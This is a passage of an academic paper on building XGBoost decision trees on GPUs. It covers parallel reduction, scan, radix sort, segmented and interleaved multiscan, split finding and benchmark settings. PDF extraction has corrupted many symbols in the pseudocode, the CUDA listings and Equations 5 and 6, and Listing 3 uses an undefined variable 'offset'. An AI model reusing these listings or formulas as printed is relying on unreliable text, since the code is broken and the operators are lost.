Listing 2 Warp reduction __device__ float warp_reduce(float x) { for (int d = 16; d > 0; d /= 2) x += __shfl_down(x, d); return x; } Reductions are highly efficient operations on GPUs. An implementation is given in Harris (2007) that approaches the maximum bandwidth of the device tested. Parallel prefix sum (scan) The prefix sum takes a binary associative operator (most commonly addition) and applies it to an array of elements. Given a binary associative operator and an array of elements the prefix sum returns ½a0; ða0 a1Þ; :::; ða0 a1 ::: an�1Þ�. A prefix sum is an example of a calculation which seems inherently serial but has an efficient parallel algorithm: the Blelloch scan algorithm. Let us consider a simple implementation of a parallel scan first, as described in Hillis & Steele (1986). It is given in Algorithm 1. Figure 4 shows it in operation: we apply a simple scan with the addition operator to an array of 1’s. Given one thread for each input element the scan takes log2 n ¼ 3 iterations to complete. The algorithm performs O(nlog2n) addition operations. Given that a sequential scan performs only n addition operations, the simple parallel scan is not work efficient. A work efficient parallel algorithm will perform the same number Figure 3 Sum parallel reduction. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 13/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ of operations as the sequential algorithm and may provide significantly better performance in practice. A work efficient algorithm is described in Blelloch (1990). The algorithm is separated into two phases, an ‘upsweep’ phase similar to a reduction and a ‘downsweep’ phase. We give pseudocode for the upsweep (Algorithm 2) and downsweep (Algorithm 3) phases by following the implementation in Harris, Sengupta & Owens (2007). Figure 4 Simple parallel scan example. Algorithm 1 Simple scan 1 for d=1 to log2n do 2 for k=0 to n-1 in parallel do 3 if k 2d-1 then 4 x[k] := x[k - 2d-1] + x[k] 5 end 6 end 7 end Algorithm 2 Blelloch scan—upsweep 1 offset = 1 2 for d= log2 n to 1 do 3 for k=0 to n-1 in parallel do 4 if k < 2 d-1 then 5 ai = offset � (2 � k + 1) - 1 6 bi = offset � (2 � k + 2) - 1 7 x[bi] = x[bi] + x[ai] 8 end 9 end 10 offset = offset * 2 11 end Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 14/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Figures 5 and 6 show examples of the work efficient Blelloch scan, as an exclusive scan (the sum for a given item excludes the item itself). Solid lines show summation with the previous item in the array, dotted lines show replacement of the previous item with the new value. O(n) additions are performed in both the upsweep and downsweep phase resulting in the same work efficiency as the serial algorithm. A segmented variation of scan that processes contiguous blocks of input items with different head flags can be easily formulated. This is achieved by creating a binary associative operator on key value pairs. The operator tests the equality of the keys and sums the values if they belong to the same sequence. This is discussed further in ‘Scan and reduce on multiple sequences.’ Figure 5 Blelloch scan upsweep example. Algorithm 3 Blelloch scan—downsweep 1 offset ¼ 2log2n�1 2 x[n - 1] := 0 3 for d=1 to log2n do 4 for k=0 to n-1 in parallel do 5 if k < 2 d-1 then 6 ai = offset � (2 � k + 1) - 1 7 bi = offset � (2 � k + 2) - 1 8 t = x[ai] 9 x[ai] = x[bi] 10 x[bi] = x[bi] + t 11 end 12 end 13 offset = offset/2 14 end Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 15/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ A scan may also be implemented using warp intrinsics to create fast 32 item prefix sums based on the simple scan in Fig. 4. Code for this is shown in Listing 3. Although the simple scan algorithm is not work efficient, we use this approach for small arrays of size 32. Listing 3 Warp scan __device__ float warp_scan(float x) { int lane_id = threadIdx.x % 32; for (int d = 1; d < 32; d �= 2){ float tmp = __shfl_up(x, d); if (lane_id >= offset){ x += tmp; } } return x; } Radix sort Radix sorting on GPUs follows from the ability to perform parallel scans. A scan operation may be used to calculate the scatter offsets for items within a single radix digit as described in Algorithm 4 and Fig. 7. Flagging all ‘0’ digits with a one and performing an exclusive scan over these flags gives the new position of all zero digits. All ‘1’ digits must be placed after all ‘0’ digits, therefore the final positions of the ‘1’s can be calculated as the exclusive scan of the ‘1’s plus the total number of ‘0’s. The exclusive scan of ‘1’ digits does not need to be calculated as it can be inferred from the array index and the exclusive scan of ‘0’s. For example, at index 5 (using 0-based indexing), if our exclusive scan shows a sum of 3 ‘0’s, then there must be two ‘1’s because a digit can only be 0 or 1. Figure 6 Blelloch scan downsweep example. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 16/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ The basic radix sort implementation only sorts unsigned integers but this can be extended to correctly sort signed integers and floating point numbers through simple bitwise transformations. Fast implementations of GPU radix sort perform a scan over many radix bits in a single pass. Merrill & Grimshaw (2011) show a highly efficient and practical implementation of GPU radix sorting. They show speedups of 2� over a 32 core CPU and claim to have the fastest sorting implementation for any fully programmable microarchitecture. Algorithm 4 Radix sort pass Input :X Output :Y 1 for i = 0 to n - 1 in parallel do 2 F[i] := bit_flip(X[i]) 3 end 4 S := exclusive_scan(F) 5 r := S[n - 1] + F[n - 1] 6 for i = 0 to n - 1 in parallel do 7 if X[i] = 0 then 8 A[i] := S[i] 9 else if X[i] = 1 then 10 A[i] := i - S[i] + r 11 end 12 for i = 0 to n - 1 in parallel do 13 Y[A[i]] := X[i] 14 end Figure 7 Radix sort example. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 17/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Scan and reduce on multiple sequences Variations on scan and reduce consider multiple sequences contained within the same input array and identified by key flags. This is useful for building decision trees as the data can be repartitioned into smaller and smaller groups as we build the tree. We will describe an input array as containing either ‘interleaved’ or ‘segmented’ sequences. Table 5 shows an example of two interleaved sequences demarcated by flags. Its values are mixed up and do not reside contiguously in memory. This is in contrast to Table 6, with two ‘segmented’ sequences. The segmented sequences reside contiguously in memory. Segmented scan A scan can be performed on the sequences from Table 6 using the conventional scan algorithm described in ‘Parallel prefix sum (scan)’ by modifying the binary associative operator to accept key value pairs. Listing 4 shows an example of a binary associative operator that performs a segmented summation. It resets the sum when the key changes. Listing 4 Segmented sum operator KeyValue op(KeyValue a, KeyValue b){ if(a.key == b.key){ b.value += a.value; return b; } else{ return b; } } Segmented reduce A segmented reduction can be implemented efficiently by applying the segmented scan described above and collecting the final value of each sequence. This is because the last element in a scan is equivalent to a reduction. Table 5 Interleaved sequences. Sequence Id 0 0 1 0 1 1 Values 1 1 1 1 1 1 Values scan 1 2 1 3 2 3 Table 6 Segmented sequences. Sequence Id 0 0 0 1 1 1 Values 1 1 1 1 1 1 Values scan 1 2 3 1 2 3 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 18/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Interleaved sequences: multireduce A reduction operation on interleaved sequences is commonly described as a multireduce operation. To perform a multireduce using the conventional tree algorithm described in ‘Reduction’ a vector of sums can be passed up the tree instead of a single value, with one sum for each unique sequence. As the number of unique sequences or ‘buckets’ increases, this algorithm becomes impractical due to limits on temporary storage (registers and shared memory). A multireduce can alternatively be formulated as a histogram operation using atomic operations in shared memory. Atomic operations allow multiple threads to safely read/write a single piece of memory. A single vector of sums is kept in shared memory for the entire thread block. Each thread can then read an input value and increment the appropriate sum using atomic operations. When multiple threads contend for atomic read/write access on a single piece of memory they are serialised. Therefore, a histogram with only one bucket will result in the entire thread block being serialised (i.e. only one thread can operate at a time). As the number of buckets increases this contention is reduced. For this reason the histogram method will only be appropriate when the input sequences are distributed over a large number of buckets. Interleaved sequences: multiscan A scan operation performed on interleaved sequences is commonly described as a multiscan operation. A multiscan may be implemented, like multireduce, by passing a vector of sums as input to the binary associative operator. This increases the local storage requirements proportionally to the number of buckets. General purpose multiscan for GPUs is discussed in Eilers (2014) with the conclusion that ‘multiscan cannot be recommended as a general building block for GPU algorithms.’ However, highly practical implementations exist that are efficient up to a limited number of interleaved buckets, where the vector of sums approach does not exceed the capacity of the device. The capacity of the device in this case refers to the amount of registers and shared memory available for each thread to store and process a vector. Merill and Grimshaw’s optimised radix sort implementation (Merrill & NVIDIA-Labs, 2016; Merrill & Grimshaw, 2011), mentioned in ‘Radix sort,’ relies on an eight-way multiscan in order to calculate scatter addresses for up to 4 bits at a time in a single pass. Floating point precision The CPU implementation of the XGBoost algorithm represents gradient/Hessian pairs using two 32 bit floats. All intermediate summations are performed using 64 bit doubles to control loss of precision from floating point addition. This is problematic when using GPUs as the number of intermediate values involved in a reduction scales with the input size. Using doubles significantly increases the usage of scarce registers and shared memory; moreover, gaming GPUs are optimised for 32 bit floating point operations and give relatively poor double precision throughput. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 19/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Table 7 shows the theoretical GFLOPs of two cards we use for benchmarking. The single precision GFLOPs are calculated as 2� number of CUDA cores � core clock speed (in GHz), where the factor of 2 represents the number of operations per required FMA (fused-multiply-add) instruction. Both these cards have 32 times more single precision ALUs (arithmetic logic units) than double precision ALUs, resulting in 1/32 the theoretical double precision performance. Therefore, an algorithm relying on double precision arithmetic will have severely limited performance on these GPUs. We can test the loss of precision from 32 bit floating point operations to see if double precision is necessary by considering 32 bit parallel and sequential summation, summing over a large array of random numbers. Sequential double precision summation is used as the baseline, with the error measured as the absolute difference from the baseline. The experiment is performed over 10 million random numbers between -1 and 1, with 100 repeats. The mean error and standard deviation are reported in Table 8. The Thrust library is used for parallel GPU reduction based on single precision operations. The 32 bit parallel summation shows dramatically superior numerical stability compared to the 32 bit sequential summation. This is because the error of parallel summation grows proportionally to O(logn), as compared to O(n) for sequential summation (Higham, 1993). The parallel reduction algorithm from Fig. 3 is commonly referred to as ‘pairwise summation’ in literature relating to floating point precision. The average error of 0.0007 over 10 million items shown in Table 8 is more than acceptable for the purposes of gradient boosting. The results also suggests that the sequential summation within the original XGBoost could be safely performed in single precision floats. A mean error of 0.0694 over 10 million items is very unlikely to be significant compared to the noise typically present in the training sets of supervised learning tasks. Building tree classifiers on GPUs Graphics processing unit-accelerated decision trees and forests have been studied as early as 2008 in Sharp (2008) for the purpose of object recognition, achieving speedups of up to 100� for this task. Decision forests were mapped to a 2-D texture array and trained/evaluated using GPU pixel and vertex shaders. A more general purpose random forest implementation is described in Grahn et al. (2011) showing speedups of Table 7 GPU GFLOPs. GPU Single precision Double precision GTX 970 (Maxwell) 3,494 109 Titan X (Pascal) 10,157 317 Table 8 32 bit floating point precision. Algorithm Mean error SD Sequential 0.0694 0.0520 Parallel 0.0007 0.0005 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 20/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ up to 30� over state-of-the-art CPU implementations for large numbers of trees. The authors use an approach where one GPU thread is launched to construct each tree in the ensemble. A decision tree construction algorithm using CUDA based on the SPRINT decision tree inducer is described in Chiu, Luo & Yuan (2011). No performance results are reported. Another decision tree construction algorithm is described in Lo et al. (2014). They report speedups of 5–55� over WEKA’s Java-based implementation of C4.5 (Quinlan, 2014), called J48, and 18� over SPRINT. Their algorithm processes one node at a time and as a result scales poorly at higher tree depths due to higher per-node overhead as compared to a CPU algorithm. Nasridinov, Lee & Park (2014) describe a GPU-accelerated algorithm for ID3 decision tree construction, showing moderate speedups over WEKA’s ID3 implementation. Nodes are processed one at a time and instances are resorted at every node. Strnad & Nerat (2016) devise a decision tree construction algorithm that stores batches of nodes in a work queue on the host and processes these units of work on the GPU. They achieve speedups of between 2� and 7� on large data sets as compared to a multithreaded CPU implementation. Instances are resorted at every node (Strnad & Nerat, 2016). Our work has a combination of key features differentiating it from these previous approaches. First, our implementation processes all nodes in a level concurrently, allowing it to scale beyond trivial depths with near constant run-time. A GPU tree construction algorithm that processes one node at a time will incur a nontrivial constant kernel launch overhead for each node processed. Additionally, as the training set is recursively partitioned at each level, the average number of training examples in each node decreases rapidly. Processing a small number of training examples in a single GPU kernel will severely underutilise the device. This means the run-time increases dramatically with tree depth. To achieve state-of-the-art results in data mining competitions we found that users very commonly required tree depths of greater than 10 in XGBoost. This contradicts the conventional wisdom that a tree depth of between 4 and 8 is sufficient for most boosting applications (Friedman, Hastie & Tibshirani, 2001). Our approach of processing all nodes on a level concurrently is far more practical in this setting. Secondly, our decision tree implementation is not a hybrid CPU/GPU approach and so does not use the CPU for computation. We find that all stages of the tree construction algorithm can be efficiently completed on the GPU. This was a conscious design decision in order to reduce the bottleneck of host/device memory transfers. At the time of writing, host/device transfers are limited to approximately 16 GB/s by the bandwidth of the Gen 3 PCIe standard. The Titan X GPU we use for benchmarking has an on-device memory bandwidth of 480 GB/s, a factor of 30 times greater. Consequently, applications that move data back and forward between the host and device will not be able to achieve peak performance. Building the entire decision tree in device memory has the disadvantage that the device often has significantly lower memory capacity than the host. Despite this, we show that it is possible to process some very large benchmark datasets entirely in device memory on a commodity GPU. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 21/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Thirdly, our algorithm implements the sparsity aware tree construction method introduced by XGBoost. This allows it to efficiently process sparse input matrices in terms of run-time and memory usage. This is in contrast to previous GPU tree construction algorithms. Additionally, our implementation is provided as a part of a fully featured machine learning library. It implements regression, binary classification, multiclass classification and ranking through the generalised gradient boosting framework of XGBoost and has an active user base. No published implementations exist for any of the existing GPU tree construction algorithms described above, making direct comparison to the approach presented in this work infeasible. PARALLEL TREE CONSTRUCTION Our algorithm builds a single decision tree for a boosting iteration by processing decision tree nodes in a level-wise manner. At each level we search for the best split within each leaf node, update the positions of training instances based on these new splits and then repartition data if necessary. Processing an entire level at a time allows us to saturate the GPU with the maximum amount of work available in a single iteration. Our algorithm performs the following three high level phases for each tree level until the maximum tree depth is reached: (1) find splits, (2) update node positions, and (3) sort node buckets (if necessary). Phase 1: find splits The first phase of the algorithm finds the best split for each leaf node at the current level. Data layout To facilitate enumeration through all split points, the feature values should be kept in sorted order. Hence, we use the device memory layout shown in Tables 9 and 10. Each feature value is paired with the ID of the instance it belongs to as well as the leaf node it currently resides in. Data are stored in sparse column major format and instance IDs are used to map back to gradient pairs for each instance. All data are stored in arrays in device memory. The tree itself can be stored in a fixed length device array as it is strictly binary and has a maximum depth known ahead of time. Block level parallelism Given the above data layout notice that each feature resides in a contiguous block and may be processed independently. In order to calculate the best split for the root node of the tree, we greedily select the best split within each feature, delegating a single thread block per feature. The best splits for each feature are then written out to global memory and are reduced by a second kernel. A downside of this approach is that when the number of features is not enough to saturate the number of streaming multiprocessors—the hardware units responsible for executing a thread block—the device will not be fully utilised. Calculating splits In order to calculate the best split for a given feature we evaluate Eq. (4) at each possible split location. This depends on (GL, HL) and (GR, HR). We obtain (GL, HL) Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 22/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ from a parallel scan of gradient pairs associated with each feature value. (GR, HR) can be obtained by subtracting (GL, HL) from the node total which we know from the parent node. The thread block moves from left to right across a given feature, consuming ‘tiles’ of input. A tile herein refers to the set of input items able to be processed by a thread block in one iteration. Table 11 gives an example of a thread block with four threads evaluating a tile with four items. For a given tile, gradient pairs are scanned and all splits are evaluated. Each 32 thread warp performs a reduction to find the best local split and keeps track of the current best feature value and accompanying gradient statistics in shared memory. At the end of processing the feature, another reduction is performed over all the warps’ best items to find the best split for the feature. Missing values The original XGBoost algorithm accounts for missing values by scanning through the input values twice as described in ‘XGBoost: handling missing values’—once in the forwards direction and once in the reverse direction. An alternative method used by our GPU algorithm is to perform a sum reduction over the entire feature before scanning. The gradient statistics for the missing values can then be calculated as the node sum statistics minus the reduction. If the sum of the gradient pairs from the missing values is known, only a single scan is then required. This method was chosen as the cost of a reduction can be significantly less than performing the second scan. Table 10 Device memory layout: gradient pairs. Instance id 0 1 2 3 Gradient pair p0 p1 p2 p3 Table 9 Device memory layout: feature values. f0 f1 f2 Node id 0 0 0 0 0 0 0 0 Instance id 0 2 3 3 2 0 1 3 Feature value 0.1 0.5 0.9 5.2 3.1 3.6 3.9 4.7 Table 11 A single thread block evaluating splits. Thread block 0 ⇒ B B B B f0 Instance id 0 2 3 1 7 5 6 4 Feature value 0.1 0.2 0.3 0.5 0.5 0.7 0.8 0.8 Gradient pair p0 p2 p3 p1 p7 p5 p6 p4 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 23/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Node buckets So far the algorithm description only explains how to find a split at the first level where all instances are bucketed into a single node. A decision tree algorithm must, by definition, separate instances into different nodes and then evaluate splits over these subsets of instances. This leaves us with two possible options for processing nodes. The first is to leave all data instances in their current location, keeping track of which node they currently reside in using an auxiliary array as shown in Table 12. When we perform a scan across all data values we keep temporary statistics for each node. We therefore scan across the array processing all instances as they are interleaved with respect to their node buckets. This is the method used by the CPU XGBoost algorithm. We also perform this method on the GPU, but only to tree depths of around 5. This interleaved algorithm is fully described in ‘Interleaved algorithm: finding a split.’ The second option is to radix sort instances by their node buckets at each level in the tree. This second option is described fully in ‘Sorting algorithm: finding a split.’ Briefly, data values are first ordered by their current node and then by feature values within their node buckets as shown in Table 13. This transforms the interleaved scan (‘multiscan’) problem described above into a segmented scan, which has constant temporary storage requirements and thus scales to arbitrary depths in a GPU implementation. In our implementation, we use the interleaved method for trees of up to depth 5 and then switch to the sorting version of the algorithm. Avoiding the expensive radix sorting step for as long as possible can provide speed advantages, particularly when building small trees. The maximum number of leaves at depth 5 is 32. At greater depths there are insufficient shared memory resources and the exponentially increasing run-time begins to be uncompetitive. Interleaved algorithm: finding a split In order to correctly account for missing values a multireduce operation must be performed to obtain the sums within interleaved sequences of nodes. A multiscan is Table 12 Interleaved node buckets. f0 f1 f2 Node id 2 1 2 2 1 2 1 2 Instance id 0 2 3 3 2 0 1 3 Feature value 0.1 0.5 0.9 5.2 3.1 3.6 3.9 4.7 Table 13 Sorted node buckets. f0 f1 f2 Node id 1 2 2 1 2 Instance id 0 2 3 3 2 1 0 3 Feature value 0.5 0.1 0.9 5.2 3.1 3.9 3.6 4.7 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 24/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ then performed over gradient pairs. Following that, unique feature values are identified and gain values calculated to identify the best split for each node. We first discuss the multireduce and multiscan operations before considering how to evaluate splits. Multireduce and multiscan Algorithms 5 and 6 outline the approach used for multireduce/multiscan at the thread block level. Our multiscan/multireduce approach is formulated around sequentially executing fast warp synchronous scan/reduce operations for each bucket. Passing vectors of items to the binary associative operator is not generally possible given the number of buckets and the limited temporary storage. This was discussed in ‘Scan and reduce on multiple sequences.’ We instead perform warp level multiscan operations. Listing 5 shows how a 32-thread warp can perform a multiscan by masking off non-active node buckets and performing a normal warp scan for each node bucket. The function ‘WarpExclusiveScan()’ herein refers to an exclusive version of the warp scan described in Listing 3. Listing 5 Warp multiscan gpu_gpair gpair; //Gradient values for current item int node_id; //Node bucket of current item gpu_gpair exclusive_scan_output; for (int NODE = 0; NODE < N_NODES; NODE++) { bool node_active = node_id == NODE; gpu_gpair scan_result; gpu_gpair node_sum; Algorithm 5 Multireduce—thread block execution 1. An input tile is loaded. 2. Each warp performs local reduction for each bucket, masking off items for the current bucket. 3. Each warp adds its local reductions into shared memory. 4. The remaining tiles are processed. 5. The partial sums in shared memory are reduced by a single warp into the final node sums. Algorithm 6 Multiscan—thread block execution 1. An input tile is loaded. 2. Each warp performs local scans for each bucket, masking off items for the current bucket. 3. The sums from each local scan are placed into shared memory. 4. The partial sums in shared memory are scanned. 5. The scanned partial sums in shared memory are added back into the local values. 6. The running sum from the previous tile is added to the local values. 7. The remaining tiles are processed. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 25/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ //First argument is the scan input //Result is placed in the second argument //Warp sum is placed in the third argument WarpExclusiveScan(node_active ? gpair : gpu_gpair(), scan_result, node_sum); if (node_active) { exclusive_scan_output = scan_result; } } Note that the number of warp reductions/scans performed over a warp of data increases exponentially with tree depth. This leads to an exponentially increasing run time relative to the depth of the tree, but is surprisingly performant even up to depth 6 as warp synchronous reductions/scans using shuffle instructions are cheap to compute. They only perform operations on registers and incur no high latency reads or writes into global memory. The exclusive scan for the entire input tile is calculated from individual warp scans by performing the same multiscan operation over the sums of each warp scan and scattering the results of this back into each item. More detailed information on how to calculate a block-wide scan from smaller warp scan operations is given in Nvidia (2016). Evaluating splits There is one additional problem that must be solved. It arises as a consequence of processing node buckets in interleaved order. In a decision tree algorithm, when enumerating through feature values to find a split, we should not choose a split that falls between two elements with the same value. This is because a decision rule will not be able to separate elements with the same value. For a value to be considered as a split, the corresponding item must be the leftmost item with that feature value for that particular node (we could also arbitrarily take the rightmost value). Because the node buckets are interleaved, it is not possible to simply check the item to the left to see if the feature value is the same—the item to the left of a given item may reside in a different node. To check if an item with a certain feature value is the leftmost item with that value in its node bucket, we can formulate a scan with a special binary associative operator. First, each item is assigned a bit vector~x of length n + 1 where n is the number of buckets. If the item resides within bucket i then xi will be set to 1. If the item’s feature value is distinct from the value of the item directly to the left (irrespective of bucket) then xn+1 is set to 1. All other bits are set to 0. We can then define a binary associative operator as follows: opð~a;~bÞ ¼ � ~b if bnþ1 ¼ 1 ~a _~b ; otherwise (5) Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 26/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Bit xn+1 acts as a segmentation flag, resetting the scan so many small scans are performed across groups of items with the same feature value. Scanning the bucket flags with a logical or operator determines which node buckets are represented in the items to the left of the current item. Therefore, within a group of items with the same feature value, if the current item’s bucket flag is set to 0 for the bucket it resides in, the item represents the leftmost item with that value in its bucket. This item can then be used as a split point. In practice, a 64 bit integer is used as the bit vector in order to hold a maximum of 33 bits at the sixth level of the tree (the maximum number of active nodes at this level +1 for the segmentation flag). The operator is formulated according to Listing 6 in C++ code. Moreover, when applying this interleaved algorithm we cannot choose the split value as the halfway point between two training examples: We do not know the value of the item to the left within the current node, only if it is the same as the current item or not. The split value is accordingly calculated as the current value minus some small constant. This distinction in the split value does not affect accuracy in practice. Listing 6 Binary associative operator BitFlagSet op(const BitFlagSet &a, const BitFlagSet &b) { if (check_bit(b, 63)) { return b; } else { return a | b; } } Complete algorithm Given a reduction, scan and the above method for finding unique feature values we have all the machinery necessary to enumerate splits and select the best. The complete algorithm for a thread block processing a single feature at a given tree level is shown in Algorithm 7. The output of this algorithm contains the best split for each leaf node for a given feature. Each thread block outputs the best splits for its assigned feature. These splits are then further reduced by a global kernel to find the best splits for any feature. Sorting algorithm: finding a split The sorting implementation of the split finding algorithm operates on feature value data grouped into node buckets. Given data sorted by node ID first and then feature values second we can perform segmented scan/reduce operations over an entire feature only needing a constant amount of temporary storage. The segmented reduction to find gradient pair sums for each node is implemented as a segmented sum scan, storing the final element from each segment as the node sum. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 27/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Another segmented scan is then performed over the input feature to get the exclusive scan of gradient pairs. After scanning each tile, the split gain is calculated using the scan and reduction as input and the best splits are stored in shared memory. The segmented scan is formulated by performing an ordinary scan over key value pairs with a binary associative operator that resets the sum when the key changes. In this case the key is the current node bucket and the value is the gradient pair. The operator is shown in Eq. (6). opðakey; avalue; bkey; bvalueÞ ¼ ðbkey; bvalueÞ; if akey 6¼ bkey ðbkey; avalue þ bvalueÞ; otherwise � (6) An overview of the split finding algorithm for a single thread block processing a feature is provided in Algorithm 8. The output of this algorithm, like that of the interleaved algorithm, consists of the best splits for each feature, and each node. This is reduced by a global kernel to find the best splits for each node, of any feature. Algorithm 7 Interleaved algorithm—thread block execution 1. Load input tile 2. Multireduce tile gradient pairs 3. Go to 1. until all tiles processed 4. Return to first tile 5. Load input tile 6. Multiscan tile gradient pairs 7. Scan tile for unique feature values 8. Calculate gain for each split 9. Store best split for each warp 10. Go to 5. until all tiles processed 11. Output best splits Algorithm 8 Sorting algorithm split finding—thread block execution 1. Load input tile 2. Segmented reduction over tile gradient pairs 3. Go to 1. until all tiles processed 4. Return to first tile 5. Load input tile 6. Segmented scan over tile gradient pairs 7. Calculate gain for each split 8. Store best split for each warp 9. Go to 5. until all tiles processed 10. Output best splits Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 28/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Phase 2: update node positions Once the best splits for each node have been calculated, the node positions for each instance must be updated. This is made non-trivial because of the presence of missing values. We first create an array containing the pre-split node position of each training instance. These node positions are then updated as if they contained all missing values, according to the default missing direction in the newly calculated splits. We then update this array again based on the feature values of the instances. Any instance which does not have a value for that feature (missing value) will have its node position left unchanged as per the missing direction. Because we now have the updated node position for each instance, we write these node positions back to each feature value. To illustrate this with an example, Fig. 8 shows the state of a decision tree after having calculated splits for level 1. The node positions in the data structure used for split finding (Table 14) must be updated before proceeding to calculate the splits for level 2. To do this we update the array in Table 15 that maps instances to a node. First we update the node ID map in the missing direction. All instances residing in node 1 are updated in the right direction to node 4. Instances residing in node 2 are updated in the left direction to node 5. The node ID map now looks like Table 16. We now update the map again using the feature values from Table 14, overwriting the previous values. Instance 0 resides in node 1 so we check if f0 < 0.8. This is true so instance 0 moves down the left branch into node 3. Instance 1 moves into node 5 and instance 2 moves into node 6 based on their f1 values. Note that instance 3 has a missing value for f0. Its node position is therefore kept as the missing direction updated in the previous step. This process is shown in Table 17. The per instance node ID array is now up-to-date for the new level so we write these values back into the per feature value array, giving Table 18. Phase 3: sort node buckets If the sorting version of the algorithm is used, the feature values need to be sorted by node position. If the interleaved version of the algorithm is used (e.g. in early tree levels) this step is unnecessary. Each feature value with its updated node position is sorted such Figure 8 Decision tree: four new leaves. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 29/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ that each node bucket resides in contiguous memory. This is achieved using a segmented key/value radix sort. Each feature represents a segment, the sort key is the node position and the feature value/instance ID tuple is the value. We use the segmented radix sort function from the CUB library. It delegates the sorting of each feature segment to a separate thread block. Note that radix sorting is stable so the original sorted order of the feature values will be preserved within contiguous node buckets, after sorting with node position as the key. EVALUATION The performance and accuracy of the GPU tree construction algorithm for XGBoost is evaluated on several large datasets and two different hardware configurations and also compared to CPU-based XGBoost on a 24 core Intel processor. The hardware Table 14 Per feature value array. f0 f1 Node id 1 2 2 1 1 2 2 Instance id 0 2 1 3 0 1 2 Feature value 0.75 0.5 0.9 2.7 4.1 3.6 3.9 Table 15 Node ID map. Instance id 0 1 2 3 Node id 1 2 2 1 Table 16 Updated missing direction. Instance id 0 1 2 3 Node id 4 5 5 4 Table 17 Node ID map: update based on feature value. Instance id 0 1 2 3 Node id 3 5 6 4 f0 f1 Node id 1 2 2 1 1 2 2 Instance id 0 2 1 3 1 1 2 Feature value 0.75 0.5 0.9 2.7 4.1 3.6 3.9 Table 18 Per feature value array: updated. f0 f1 Node id 3 6 5 4 3 5 6 Instance id 0 2 1 3 0 1 2 Feature value 0.75 0.5 0.9 2.7 4.1 3.6 3.9 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 30/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ configurations are described in Table 19. On configuration #1, where there is limited device memory, a subset of rows from each dataset is taken in order to fit within device memory. The datasets are described in Table 20 and parameters used for each dataset are shown in Table 21. For the YLTR dataset we use the supplied training/test split. For the Higgs dataset we randomly select 5,00,000 instances for the test set, as in Chen & Guestrin (2016). For the Bosch dataset we randomly sample 10% of the instances for the test set and use the rest for the training set. We use 500 boosting iterations for all datasets unless otherwise specified. This is a common real world setting that provides sufficiently long run-times for benchmarking. We set � (the learning rate) to 0.1 as the XGBoost default of 0.3 is too high for the number of boosting iterations. For the YLTR and Bosch datasets we use the default tree depth of six because both of these datasets tend to generate small trees. The Higgs dataset results in larger trees so we can set max depth to 12, allowing us to test performance for large trees. Both the Higgs and Bosch datasets are binary classification problems so we use the binary:logistic objective function for XGBoost. Both Higgs and Bosch also exhibit highly imbalanced class distributions, so the AUC (area under the Table 19 Hardware configurations. Configuration CPU GHz Cores CPU arch. #1 Intel i5-4590 3.30 4 Haswell #2 Intel i7-6700K 4.00 4 Skylake #3 2� Intel Xeon E5-2695 v2 2.40 24 Ivy Bridge Configuration GPU GPU memory (GB) GPU arch. #1 GTX970 4 Maxwell #2 Titan X 12 Pascal #3 – – – Table 20 Datasets. Dataset Training instances Test instances Features YLTR a 473,134 165,660 700 Higgs b 10,500,000 500,000 28 Bosch c 1,065,373 118,374 968 Notes: a https://webscope.sandbox.yahoo.com/catalog.php?datatype=c. b https://archive.ics.uci.edu/ml/datasets/HIGGS. c https://www.kaggle.com/c/bosch-production-line-performance/data. Table 21 Parameters. Dataset Objective eval_metric max_depth Eta Boosting iterations YLTR rank:ndcg ndcg@10 6 0.1 500 Higgs binary:logistic auc 12 0.1 500 Bosch binary:logistic auc 6 0.1 500 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 31/37 https://webscope.sandbox.yahoo.com/catalog.php?datatype=c https://archive.ics.uci.edu/ml/datasets/HIGGS https://www.kaggle.com/c/bosch-production-line-performance/data http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ 